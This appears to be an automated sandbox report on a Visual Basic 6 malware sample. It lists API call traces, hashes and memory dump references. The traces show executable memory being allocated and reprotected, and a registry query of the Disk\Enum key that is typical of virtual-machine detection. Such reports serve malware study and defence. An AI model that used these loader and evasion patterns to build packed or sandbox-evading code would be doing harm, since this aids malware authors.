                                                                                                                                                        0x00424e66
                                                                                                                                                        0x00424e7a
                                                                                                                                                        0x00424e7a
                                                                                                                                                        0x00424e4c
                                                                                                                                                        0x00424e56
                                                                                                                                                        0x00424e5d
                                                                                                                                                        0x00424e60
                                                                                                                                                        0x00424e60
                                                                                                                                                        0x00424e2c
                                                                                                                                                        0x00424e36
                                                                                                                                                        0x00424e3a
                                                                                                                                                        0x00424e3d
                                                                                                                                                        0x00424e3d
                                                                                                                                                        0x00424e2a
                                                                                                                                                        0x00424e7d
                                                                                                                                                        0x00424e85
                                                                                                                                                        0x00424e8d
                                                                                                                                                        0x00424e95
                                                                                                                                                        0x00424e99
                                                                                                                                                        0x00424ea1
                                                                                                                                                        0x00424ea5
                                                                                                                                                        0x00424eb6
                                                                                                                                                        0x00424eba
                                                                                                                                                        0x00424ec0
                                                                                                                                                        0x00424ed8
                                                                                                                                                        0x00424edb
                                                                                                                                                        0x00000000

                                                                                                                                                        APIs
                                                                                                                                                        • NtAllocateVirtualMemory.NTDLL(000000FF,00000100,00000000,00000100,00003000,00000040,?,SysAllocStringByteLen,004249BB,?,SysAllocStringByteLen,004249D5,?,SysAllocStringByteLen,004249A4,SysAllocStringByteLen), ref: 00424DB1
                                                                                                                                                        • NtProtectVirtualMemory.NTDLL(000000FF,?,00000005,00000040,?,?,SysAllocStringByteLen,004249BB,?,SysAllocStringByteLen,004249D5,?,SysAllocStringByteLen,004249A4,SysAllocStringByteLen,00424A46), ref: 00424DDC
                                                                                                                                                        • NtProtectVirtualMemory.NTDLL(000000FF,?,00000005,?,?,?,SysAllocStringByteLen,004249BB,?,SysAllocStringByteLen,004249D5,?,SysAllocStringByteLen,004249A4,SysAllocStringByteLen,00424A46), ref: 00424ED8
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001B.00000002.360553952.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001B.00000002.360543174.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 0000001B.00000002.360729782.0000000000598000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 0000001B.00000002.360740463.0000000000599000.00000004.00020000.sdmp Download File
                                                                                                                                                        • Associated: 0000001B.00000002.360749965.000000000059B000.00000002.00020000.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: MemoryVirtual$Protect$Allocate
                                                                                                                                                        • String ID: SysAllocStringByteLen
                                                                                                                                                        • API String ID: 955180148-3231582829
                                                                                                                                                        • Opcode ID: f249fcdf71d4b5943563eab8ac9d741a04d2b78d9f806e735652873ea1d8461f
                                                                                                                                                        • Instruction ID: 476bc6fcf3ced507283ebdb8500c36ae67bec766394659a64fe3b4c10e214d8f
                                                                                                                                                        • Opcode Fuzzy Hash: f249fcdf71d4b5943563eab8ac9d741a04d2b78d9f806e735652873ea1d8461f
                                                                                                                                                        • Instruction Fuzzy Hash: 5351E571A002259FDF00DFA8EC45BEEBBB5FBD4324F91434BE120A61D5D37856448BAA
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00427B30, Relevance: 150.9, APIs: 100, Instructions: 926COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • __vbaObjSetAddref.MSVBVM60(?,004260F5,66106AEE,00000001,660DC30A), ref: 00427BB1
                                                                                                                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,?,004025F8,0000000C), ref: 00427BD8
                                                                                                                                                        • __vbaObjSetAddref.MSVBVM60(?,?), ref: 00427BE6
                                                                                                                                                        • __vbaAryMove.MSVBVM60(0040100A,?,00000000), ref: 00427BFF
                                                                                                                                                        • __vbaFreeObj.MSVBVM60 ref: 00427C0E
                                                                                                                                                        • __vbaObjSetAddref.MSVBVM60(?,?), ref: 00427C18
                                                                                                                                                        • __vbaAryMove.MSVBVM60(0040100E,?,00000000), ref: 00427C31
                                                                                                                                                        • __vbaFreeObj.MSVBVM60 ref: 00427C3A
                                                                                                                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,?,004025F8,0000000C), ref: 00427C6D
                                                                                                                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,?,004025F8,0000000C), ref: 00427CA4
                                                                                                                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,?,004025F8,0000000C), ref: 00427CCF
                                                                                                                                                        • __vbaObjSetAddref.MSVBVM60(?,?), ref: 00427CDD
                                                                                                                                                        • __vbaStrMove.MSVBVM60(00000000), ref: 00427CEA
                                                                                                                                                        • __vbaStrCopy.MSVBVM60 ref: 00427CF5
                                                                                                                                                        • __vbaFreeStr.MSVBVM60 ref: 00427CFE
                                                                                                                                                        • __vbaFreeObj.MSVBVM60 ref: 00427D07
                                                                                                                                                        • __vbaObjSetAddref.MSVBVM60(?,?), ref: 00427D16
                                                                                                                                                          • Part of subcall function 00427230: __vbaObjSetAddref.MSVBVM60(?,00598248,660DA008,00401006,660D9FAF), ref: 0042727B
                                                                                                                                                          • Part of subcall function 00427230: __vbaHresultCheckObj.MSVBVM60(00000000,?,004025F8,0000000C), ref: 004272A6
                                                                                                                                                          • Part of subcall function 00427230: __vbaVarDup.MSVBVM60 ref: 004272D6
                                                                                                                                                          • Part of subcall function 00427230: #607.MSVBVM60(?,?,?), ref: 004272E8
                                                                                                                                                          • Part of subcall function 00427230: __vbaStrVarMove.MSVBVM60(?), ref: 004272F2
                                                                                                                                                          • Part of subcall function 00427230: __vbaStrMove.MSVBVM60 ref: 004272FD
                                                                                                                                                          • Part of subcall function 00427230: __vbaFreeVarList.MSVBVM60(00000002,?,?), ref: 0042730D
                                                                                                                                                          • Part of subcall function 00427230: #644.MSVBVM60(?), ref: 0042731A
                                                                                                                                                          • Part of subcall function 00427230: __vbaHresultCheckObj.MSVBVM60(00000000,?,004025F8,0000000C), ref: 00427346
                                                                                                                                                          • Part of subcall function 00427230: __vbaStrCopy.MSVBVM60 ref: 00427352
                                                                                                                                                        • __vbaStrMove.MSVBVM60(00000000), ref: 00427D23
                                                                                                                                                        • __vbaStrCopy.MSVBVM60 ref: 00427D2E
                                                                                                                                                        • __vbaFreeStr.MSVBVM60 ref: 00427D37
                                                                                                                                                        • __vbaFreeObj.MSVBVM60 ref: 00427D40
                                                                                                                                                        • __vbaObjSetAddref.MSVBVM60(?,?), ref: 00427D4A
                                                                                                                                                          • Part of subcall function 00427230: __vbaFreeObj.MSVBVM60(00427395), ref: 00427385
                                                                                                                                                          • Part of subcall function 00427230: __vbaFreeStr.MSVBVM60 ref: 0042738E
                                                                                                                                                        • __vbaStrMove.MSVBVM60(00000000), ref: 00427D57
                                                                                                                                                        • __vbaStrCopy.MSVBVM60 ref: 00427D62
                                                                                                                                                        • __vbaFreeStr.MSVBVM60 ref: 00427D6B
                                                                                                                                                        • __vbaFreeObj.MSVBVM60 ref: 00427D74
                                                                                                                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,?,004025F8,0000000C), ref: 00427DA1
                                                                                                                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,?,004025F8,0000000C), ref: 00427DD0
                                                                                                                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,?,004025F8,0000000C), ref: 00427DFD
                                                                                                                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,?,004025F8,0000000C), ref: 00427E24
                                                                                                                                                        • __vbaRedim.MSVBVM60(00000080,00000001,?,00000011,00000001,?,00000000), ref: 00427E42
                                                                                                                                                        • __vbaAryLock.MSVBVM60(?,?), ref: 00427E55
                                                                                                                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,?,004025F8,0000000C), ref: 00427E8A
                                                                                                                                                        • __vbaAryUnlock.MSVBVM60(?), ref: 00427E98
                                                                                                                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,?,004025F8,0000000C), ref: 00427F06
                                                                                                                                                        • __vbaRedim.MSVBVM60(00000080,00000001,?,00000011,00000001,?,00000000), ref: 00427F31
                                                                                                                                                        • __vbaAryLock.MSVBVM60(?,?), ref: 00427F3E
                                                                                                                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,?,004025F8,0000000C), ref: 00427F6D
                                                                                                                                                        • __vbaAryUnlock.MSVBVM60(?), ref: 00427F79
                                                                                                                                                        • __vbaAryLock.MSVBVM60(?,?), ref: 00427FC0
                                                                                                                                                          • Part of subcall function 00426B80: __vbaStrVarCopy.MSVBVM60(?,660DC6D9,660DC6FC,?,660DC6D9), ref: 00426BF3
                                                                                                                                                          • Part of subcall function 00426B80: __vbaStrMove.MSVBVM60 ref: 00426BFE
                                                                                                                                                          • Part of subcall function 00426B80: __vbaRedim.MSVBVM60(00000880,00000010,?,00000000,00000001,00000004,00000000), ref: 00426C1D
                                                                                                                                                          • Part of subcall function 00426B80: __vbaVarZero.MSVBVM60 ref: 00426C46
                                                                                                                                                          • Part of subcall function 00426B80: __vbaVarMove.MSVBVM60 ref: 00426C76
                                                                                                                                                          • Part of subcall function 00426B80: __vbaVarMove.MSVBVM60 ref: 00426C92
                                                                                                                                                          • Part of subcall function 00426B80: __vbaVarMove.MSVBVM60 ref: 00426CB2
                                                                                                                                                          • Part of subcall function 00426B80: #644.MSVBVM60(?), ref: 00426CB8
                                                                                                                                                        • #644.MSVBVM60(00401006), ref: 00427FD4
                                                                                                                                                        • #644.MSVBVM60(?,?,?,?), ref: 00428005
                                                                                                                                                        • #644.MSVBVM60(?), ref: 0042800D
                                                                                                                                                        • __vbaAryLock.MSVBVM60(?,?), ref: 00428026
                                                                                                                                                        • #644.MSVBVM60(00401006), ref: 00428034
                                                                                                                                                        • __vbaAryUnlock.MSVBVM60(?), ref: 0042803D
                                                                                                                                                          • Part of subcall function 00428DE0: #644.MSVBVM60(00000016,00000000,00000004), ref: 00428F13
                                                                                                                                                        • __vbaAryUnlock.MSVBVM60(?), ref: 00427FDD
                                                                                                                                                          • Part of subcall function 00428DE0: #685.MSVBVM60(?,66106AEE,660DDE99,660DC30A), ref: 00428E40
                                                                                                                                                          • Part of subcall function 00428DE0: __vbaObjSet.MSVBVM60(?,00000000), ref: 00428E4B
                                                                                                                                                          • Part of subcall function 00428DE0: __vbaHresultCheckObj.MSVBVM60(00000000,00000000,00403088,00000044), ref: 00428E9C
                                                                                                                                                          • Part of subcall function 00428DE0: __vbaFreeObj.MSVBVM60 ref: 00428EA5
                                                                                                                                                          • Part of subcall function 00428DE0: __vbaFreeVarList.MSVBVM60(00000004,?,?,?,?), ref: 00428EBD
                                                                                                                                                          • Part of subcall function 00428DE0: RtlFillMemory.KERNEL32 ref: 00428ECA
                                                                                                                                                          • Part of subcall function 00428DE0: #644.MSVBVM60(00401006), ref: 00428EDA
                                                                                                                                                          • Part of subcall function 00428DE0: #644.MSVBVM60(?,00000000,00000008), ref: 00428EF0
                                                                                                                                                        • #644.MSVBVM60(?,?,?,?), ref: 00428069
                                                                                                                                                        • #644.MSVBVM60(?), ref: 00428071
                                                                                                                                                        • __vbaRedim.MSVBVM60(00000000,00000014,00000000,00402538,00000001,660DDE98,00000000,00000000,00000000), ref: 0042809B
                                                                                                                                                        • __vbaAryLock.MSVBVM60(?,?,00000000,00000000), ref: 004280C9
                                                                                                                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,?,004025F8,0000000C,?,?,00000000,00000000), ref: 00428112
                                                                                                                                                        • __vbaVarDup.MSVBVM60(?,?,00000000,00000000), ref: 0042812C
                                                                                                                                                        • #607.MSVBVM60(?,?,?,?,?,00000000,00000000), ref: 00428143
                                                                                                                                                        • __vbaStrVarMove.MSVBVM60(?,?,?,00000000,00000000), ref: 00428153
                                                                                                                                                        • __vbaStrMove.MSVBVM60(?,?,00000000,00000000), ref: 0042815A
                                                                                                                                                        • __vbaStrCopy.MSVBVM60(?,?,00000000,00000000), ref: 00428164
                                                                                                                                                        • __vbaFreeStr.MSVBVM60(?,?,00000000,00000000), ref: 0042816D
                                                                                                                                                        • __vbaFreeVarList.MSVBVM60(00000002,?,?,?,?,00000000,00000000), ref: 0042817D
                                                                                                                                                        • #644.MSVBVM60(?,?,?,00000000), ref: 00428189
                                                                                                                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,?,004025F8,0000000C,?,?,?,00000000), ref: 004281B6
                                                                                                                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,?,004025F8,0000000C,?,?,?,00000000), ref: 004281E1
                                                                                                                                                        • __vbaVarDup.MSVBVM60(?,?,?,00000000), ref: 004281FB
                                                                                                                                                        • #607.MSVBVM60(?,?,?,?,?,?,00000000), ref: 00428212
                                                                                                                                                        • __vbaStrVarMove.MSVBVM60(?,?,?,?,00000000), ref: 0042821F
                                                                                                                                                        • __vbaStrMove.MSVBVM60(?,?,?,00000000), ref: 0042822C
                                                                                                                                                        • __vbaStrCopy.MSVBVM60(?,?,?,00000000), ref: 00428232
                                                                                                                                                        • __vbaFreeStr.MSVBVM60(?,?,?,00000000), ref: 0042823B
                                                                                                                                                        • __vbaFreeVarList.MSVBVM60(00000002,?,?,?,?,?,00000000), ref: 0042824B
                                                                                                                                                        • #644.MSVBVM60(?,?,?,?,?,?,00000000), ref: 00428257
                                                                                                                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,?,004025F8,0000000C,?,?,?,?,?,?,00000000), ref: 00428284
                                                                                                                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,?,004025F8,0000000C,?,?,?,?,?,?,00000000), ref: 004282AF
                                                                                                                                                        • __vbaVarDup.MSVBVM60(?,?,?,?,?,?,00000000), ref: 004282C9
                                                                                                                                                        • #607.MSVBVM60(?,?,?,?,?,?,?,?,?,00000000), ref: 004282E0
                                                                                                                                                        • __vbaStrVarMove.MSVBVM60(?,?,?,?,?,?,?,00000000), ref: 004282ED
                                                                                                                                                        • __vbaStrMove.MSVBVM60(?,?,?,?,?,?,00000000), ref: 004282F8
                                                                                                                                                        • __vbaStrCopy.MSVBVM60(?,?,?,?,?,?,00000000), ref: 004282FE
                                                                                                                                                        • __vbaFreeStr.MSVBVM60(?,?,?,?,?,?,00000000), ref: 00428307
                                                                                                                                                        • __vbaFreeVarList.MSVBVM60(00000002,?,?,?,?,?,?,?,?,00000000), ref: 00428317
                                                                                                                                                        • #644.MSVBVM60(?,?,?,?,?,?,?,?,?,00000000), ref: 00428323
                                                                                                                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,?,004025F8,0000000C,?,?,?,?,?,?,?,?,?,00000000), ref: 00428350
                                                                                                                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,?,004025F8,0000000C,?,?,?,?,?,?,?,?,?,00000000), ref: 0042837B
                                                                                                                                                        • __vbaRedim.MSVBVM60(00000080,00000001,660DDE88,00000011,00000001,-00000001,00000000), ref: 0042839A
                                                                                                                                                        • __vbaAryLock.MSVBVM60(?,00000000), ref: 004283AA
                                                                                                                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,?,004025F8,0000000C), ref: 004283DE
                                                                                                                                                        • __vbaAryUnlock.MSVBVM60(?), ref: 004283E8
                                                                                                                                                        • __vbaAryUnlock.MSVBVM60(?,?,00000000,00000000), ref: 004283FB
                                                                                                                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,?,004025F8,0000000C,?,00000000,00000000), ref: 0042843A
                                                                                                                                                        • __vbaRedim.MSVBVM60(00000080,00000001,660DDE88,00000011,00000001,-00000001,00000000,?,00000000,00000000), ref: 00428459
                                                                                                                                                        • __vbaAryLock.MSVBVM60(?), ref: 00428469
                                                                                                                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,?,004025F8,0000000C), ref: 00428499
                                                                                                                                                        • __vbaAryUnlock.MSVBVM60(?), ref: 004284A3
                                                                                                                                                        • __vbaAryUnlock.MSVBVM60(?,0042853B,00000000,00000000), ref: 004284F3
                                                                                                                                                        • __vbaAryDestruct.MSVBVM60(00000000,?), ref: 00428508
                                                                                                                                                        • __vbaAryDestruct.MSVBVM60(00000000,?), ref: 00428513
                                                                                                                                                        • __vbaAryDestruct.MSVBVM60(00000000,?), ref: 0042851B
                                                                                                                                                        • __vbaFreeObj.MSVBVM60 ref: 00428526
                                                                                                                                                        • __vbaFreeObj.MSVBVM60 ref: 0042852B
                                                                                                                                                        • __vbaAryDestruct.MSVBVM60(00000000,?), ref: 00428533
                                                                                                                                                        • __vbaFreeObj.MSVBVM60 ref: 00428538
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001B.00000002.360553952.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001B.00000002.360543174.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 0000001B.00000002.360729782.0000000000598000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 0000001B.00000002.360740463.0000000000599000.00000004.00020000.sdmp Download File
                                                                                                                                                        • Associated: 0000001B.00000002.360749965.000000000059B000.00000002.00020000.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: __vba$CheckHresult$Free$Move$#644$CopyUnlock$AddrefLock$Redim$List$#607Destruct$#685FillMemoryZero
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3603388376-0
                                                                                                                                                        • Opcode ID: 2876d5d36f0caa3f2ab6552c5bd7e40ae282abedf70eeff38c66eb218b410569
                                                                                                                                                        • Instruction ID: d86a795e537cfc8c1ef10866b3a3b143b5d75e3b38213463d99e96086d0f11dc
                                                                                                                                                        • Opcode Fuzzy Hash: 2876d5d36f0caa3f2ab6552c5bd7e40ae282abedf70eeff38c66eb218b410569
                                                                                                                                                        • Instruction Fuzzy Hash: 74727070A00219AFDB14DFA5DC88EAEB779FF58700F10851EF505A7290DB74A90ADF64
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00425E30, Relevance: 111.0, APIs: 60, Strings: 3, Instructions: 724COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00424D1A: NtAllocateVirtualMemory.NTDLL(000000FF,00000100,00000000,00000100,00003000,00000040,?,SysAllocStringByteLen,004249BB,?,SysAllocStringByteLen,004249D5,?,SysAllocStringByteLen,004249A4,SysAllocStringByteLen), ref: 00424DB1
                                                                                                                                                        • __vbaRedim.MSVBVM60(00000880,00000010,?,00000000,00000001,00000003,00000000), ref: 00425F88
                                                                                                                                                        • __vbaVarMove.MSVBVM60 ref: 00425FB9
                                                                                                                                                        • __vbaVarMove.MSVBVM60 ref: 00425FE4
                                                                                                                                                        • #644.MSVBVM60(?), ref: 00425FFD
                                                                                                                                                        • __vbaVarMove.MSVBVM60 ref: 00426026
                                                                                                                                                        • __vbaVarMove.MSVBVM60 ref: 0042604F
                                                                                                                                                        • __vbaErase.MSVBVM60(00000000,?), ref: 00426076
                                                                                                                                                          • Part of subcall function 00427AD0: RtlMoveMemory.KERNEL32(00000004,004291B0,00000004,004291B0,?,?,?,00426081), ref: 00427AFF
                                                                                                                                                        • #644.MSVBVM60(00000030), ref: 0042608E
                                                                                                                                                        • #644.MSVBVM60(?), ref: 0042609A
                                                                                                                                                        • __vbaObjSetAddref.MSVBVM60(?,?,?,00000000), ref: 004260B1
                                                                                                                                                        • #644.MSVBVM60(00000000), ref: 004260B8
                                                                                                                                                        • __vbaFreeObj.MSVBVM60 ref: 004260CA
                                                                                                                                                        • __vbaObjSetAddref.MSVBVM60(?,?,?,?), ref: 004260E9
                                                                                                                                                          • Part of subcall function 00427B30: __vbaObjSetAddref.MSVBVM60(?,004260F5,66106AEE,00000001,660DC30A), ref: 00427BB1
                                                                                                                                                          • Part of subcall function 00427B30: __vbaHresultCheckObj.MSVBVM60(00000000,?,004025F8,0000000C), ref: 00427BD8
                                                                                                                                                          • Part of subcall function 00427B30: __vbaObjSetAddref.MSVBVM60(?,?), ref: 00427BE6
                                                                                                                                                          • Part of subcall function 00427B30: __vbaAryMove.MSVBVM60(0040100A,?,00000000), ref: 00427BFF
                                                                                                                                                          • Part of subcall function 00427B30: __vbaFreeObj.MSVBVM60 ref: 00427C0E
                                                                                                                                                          • Part of subcall function 00427B30: __vbaObjSetAddref.MSVBVM60(?,?), ref: 00427C18
                                                                                                                                                          • Part of subcall function 00427B30: __vbaAryMove.MSVBVM60(0040100E,?,00000000), ref: 00427C31
                                                                                                                                                          • Part of subcall function 00427B30: __vbaFreeObj.MSVBVM60 ref: 00427C3A
                                                                                                                                                        • __vbaFreeObj.MSVBVM60(00000000), ref: 004260FD
                                                                                                                                                        • __vbaRedim.MSVBVM60(00000880,00000010,?,00000000,00000001,00000000,00000000,?,?,?), ref: 004262F2
                                                                                                                                                        • __vbaVarMove.MSVBVM60 ref: 00426321
                                                                                                                                                        • __vbaErase.MSVBVM60(00000000,?), ref: 00426348
                                                                                                                                                        • __vbaAryLock.MSVBVM60(?,?), ref: 00426386
                                                                                                                                                        • __vbaStrMove.MSVBVM60(25FF0059), ref: 004263B0
                                                                                                                                                        • __vbaStrMove.MSVBVM60 ref: 004263BC
                                                                                                                                                        • __vbaAryLock.MSVBVM60(?,?), ref: 004263C6
                                                                                                                                                        • __vbaStrMove.MSVBVM60 ref: 004263E3
                                                                                                                                                        • __vbaStrMove.MSVBVM60(00000000), ref: 004263EF
                                                                                                                                                        • __vbaStrCat.MSVBVM60(00000000), ref: 004263F2
                                                                                                                                                        • __vbaStrMove.MSVBVM60 ref: 004263FD
                                                                                                                                                        • __vbaStrCat.MSVBVM60(?,00000000), ref: 00426403
                                                                                                                                                        • __vbaStrMove.MSVBVM60(?,00000000), ref: 0042640E
                                                                                                                                                        • __vbaStrCat.MSVBVM60(?,00000000,?,00000000), ref: 00426415
                                                                                                                                                        • __vbaStrMove.MSVBVM60(?,00000000), ref: 00426420
                                                                                                                                                        • __vbaAryUnlock.MSVBVM60(?,?,00401016,?,00000000), ref: 00426449
                                                                                                                                                        • __vbaFreeStrList.MSVBVM60(00000007,?,?,?,?,?,?,?,?,00000000), ref: 0042647B
                                                                                                                                                        • __vbaRedim.MSVBVM60(00000880,00000010,?,00000000,00000001,00000005,00000000), ref: 004264A5
                                                                                                                                                        • __vbaVarMove.MSVBVM60 ref: 004264E2
                                                                                                                                                        • __vbaVarMove.MSVBVM60 ref: 0042651C
                                                                                                                                                        • __vbaStrMove.MSVBVM60(?), ref: 0042652C
                                                                                                                                                        • __vbaStrMove.MSVBVM60(00000000), ref: 00426539
                                                                                                                                                        • __vbaStrCat.MSVBVM60(00000000), ref: 0042653C
                                                                                                                                                        • __vbaStrMove.MSVBVM60 ref: 00426547
                                                                                                                                                        • __vbaStrCat.MSVBVM60(?,00000000), ref: 0042654D
                                                                                                                                                        • __vbaStrMove.MSVBVM60(?,00000000), ref: 00426558
                                                                                                                                                        • __vbaStrCat.MSVBVM60(?,00000000,?,00000000), ref: 0042655F
                                                                                                                                                        • __vbaStrMove.MSVBVM60(?,00000000), ref: 0042656A
                                                                                                                                                        • #644.MSVBVM60(00000000,?,00000000), ref: 0042656D
                                                                                                                                                        • __vbaVarMove.MSVBVM60(?,00000000), ref: 0042659B
                                                                                                                                                        • __vbaVarMove.MSVBVM60(?,00000000), ref: 004265C1
                                                                                                                                                        • __vbaVarMove.MSVBVM60(?,00000000), ref: 004265EE
                                                                                                                                                        • __vbaVarZero.MSVBVM60(?,00000000), ref: 0042661E
                                                                                                                                                          • Part of subcall function 00428A60: __vbaStrMove.MSVBVM60(S*Y*S*T*E*M*\*C*o*n*t*r*o*l*S*e*t*0*0*1*\*S*e*r*v*i*c*e*s*\*D*i*s*k*\*E*n*u*m*,66106AEE,00000000,660DC30A), ref: 00428ABB
                                                                                                                                                          • Part of subcall function 00428A60: #644.MSVBVM60(00000000), ref: 00428ABE
                                                                                                                                                          • Part of subcall function 00428A60: RegOpenKeyExW.ADVAPI32(80000002,00000000,00000000,00020019,?), ref: 00428AD7
                                                                                                                                                          • Part of subcall function 00428A60: __vbaFreeStr.MSVBVM60 ref: 00428AEF
                                                                                                                                                          • Part of subcall function 00428A60: #526.MSVBVM60(?,000000FF), ref: 00428B03
                                                                                                                                                          • Part of subcall function 00428A60: __vbaStrVarMove.MSVBVM60(?), ref: 00428B0D
                                                                                                                                                          • Part of subcall function 00428A60: __vbaStrMove.MSVBVM60 ref: 00428B18
                                                                                                                                                          • Part of subcall function 00428A60: __vbaStrCopy.MSVBVM60 ref: 00428B22
                                                                                                                                                          • Part of subcall function 00428A60: __vbaFreeStr.MSVBVM60 ref: 00428B2B
                                                                                                                                                          • Part of subcall function 00428A60: __vbaFreeVar.MSVBVM60 ref: 00428B30
                                                                                                                                                          • Part of subcall function 00428A60: #644.MSVBVM60(004026B8), ref: 00428B3B
                                                                                                                                                          • Part of subcall function 00428A60: #644.MSVBVM60 ref: 00428B4C
                                                                                                                                                          • Part of subcall function 00428A60: RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,?,?), ref: 00428B76
                                                                                                                                                        • __vbaErase.MSVBVM60(00000000,?,?,00000000), ref: 00426649
                                                                                                                                                        • __vbaFreeStrList.MSVBVM60(00000005,?,?,?,?,?,?,00000000), ref: 00426665
                                                                                                                                                        • __vbaAryUnlock.MSVBVM60(?), ref: 00426675
                                                                                                                                                        • __vbaRedim.MSVBVM60(00000880,00000010,?,00000000,00000001,00000000,00000000), ref: 004266C3
                                                                                                                                                        • __vbaVarZero.MSVBVM60 ref: 004266F1
                                                                                                                                                        • __vbaErase.MSVBVM60(00000000,?), ref: 0042671C
                                                                                                                                                        • __vbaAryLock.MSVBVM60(?,?), ref: 0042672A
                                                                                                                                                        • __vbaAryUnlock.MSVBVM60(?,00401016,?), ref: 00426751
                                                                                                                                                          • Part of subcall function 00426950: #595.MSVBVM60(?,?,?,?,?,66106AEE,00000000,660DC30A), ref: 004269BC
                                                                                                                                                          • Part of subcall function 00426950: __vbaFreeVarList.MSVBVM60(00000002,?,?), ref: 004269CC
                                                                                                                                                        • __vbaAryUnlock.MSVBVM60(?,004267E4), ref: 004267AC
                                                                                                                                                        • __vbaAryDestruct.MSVBVM60(00000000,?), ref: 004267BE
                                                                                                                                                        • __vbaFreeObj.MSVBVM60 ref: 004267C3
                                                                                                                                                        • __vbaAryDestruct.MSVBVM60(00402538,?), ref: 004267D2
                                                                                                                                                        • __vbaRecDestruct.MSVBVM60(0040250C,?), ref: 004267DD
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001B.00000002.360553952.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001B.00000002.360543174.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 0000001B.00000002.360729782.0000000000598000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 0000001B.00000002.360740463.0000000000599000.00000004.00020000.sdmp Download File
                                                                                                                                                        • Associated: 0000001B.00000002.360749965.000000000059B000.00000002.00020000.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: __vba$Move$Free$#644$Addref$EraseRedimUnlock$DestructListLock$MemoryZero$#526#595AllocateCheckCopyHresultOpenQueryValueVirtual
                                                                                                                                                        • String ID: "$0$0
                                                                                                                                                        • API String ID: 4061916490-2703853450
                                                                                                                                                        • Opcode ID: c0da116fc5eac64871f00a22e5b2600e31ff04afeef00fa2087d47a3f56014b7
                                                                                                                                                        • Instruction ID: 8f3503e77f08fc15d716275c0b96bcaf2cb100ac04d89d01778b58eebe260964
                                                                                                                                                        • Opcode Fuzzy Hash: c0da116fc5eac64871f00a22e5b2600e31ff04afeef00fa2087d47a3f56014b7
                                                                                                                                                        • Instruction Fuzzy Hash: A7428F70A002299FDB14DFA8DC84FEEB7B5FB44304F51825EE50AAB281DB74A949CF50
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00425BB0, Relevance: 35.2, APIs: 19, Strings: 1, Instructions: 207COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • #644.MSVBVM60(?,00595E85), ref: 00425C0F
                                                                                                                                                        • __vbaRedim.MSVBVM60(00000880,00000010,?,00000000,00000001,00000003,00000000,00000000,00000000,00000004), ref: 00425C2B
                                                                                                                                                        • __vbaVarMove.MSVBVM60 ref: 00425C57
                                                                                                                                                        • __vbaVarZero.MSVBVM60 ref: 00425C80
                                                                                                                                                        • __vbaVarMove.MSVBVM60 ref: 00425CA8
                                                                                                                                                        • __vbaVarMove.MSVBVM60 ref: 00425CC8
                                                                                                                                                        • __vbaErase.MSVBVM60(00000000,?), ref: 00425CF0
                                                                                                                                                        • __vbaRedim.MSVBVM60(00000080,00000001,?,00000011,00000001,?,00000000), ref: 00425D16
                                                                                                                                                        • __vbaAryLock.MSVBVM60(?,?), ref: 00425D2D
                                                                                                                                                        • #644.MSVBVM60(00401006), ref: 00425D3B
                                                                                                                                                        • __vbaAryUnlock.MSVBVM60(?), ref: 00425D4A
                                                                                                                                                        • __vbaAryLock.MSVBVM60(?,?,?,?,?,?), ref: 00425D71
                                                                                                                                                        • #644.MSVBVM60(00401006), ref: 00425D7F
                                                                                                                                                        • __vbaAryUnlock.MSVBVM60(?), ref: 00425D88
                                                                                                                                                        • #644.MSVBVM60(?,?,?,?), ref: 00425DA1
                                                                                                                                                        • __vbaAryLock.MSVBVM60(?,00000000,?,?,?,?), ref: 00425DB7
                                                                                                                                                        • #644.MSVBVM60(00401006,?,?,?,?), ref: 00425DC5
                                                                                                                                                        • __vbaAryUnlock.MSVBVM60(?,?,?,?,?), ref: 00425DCD
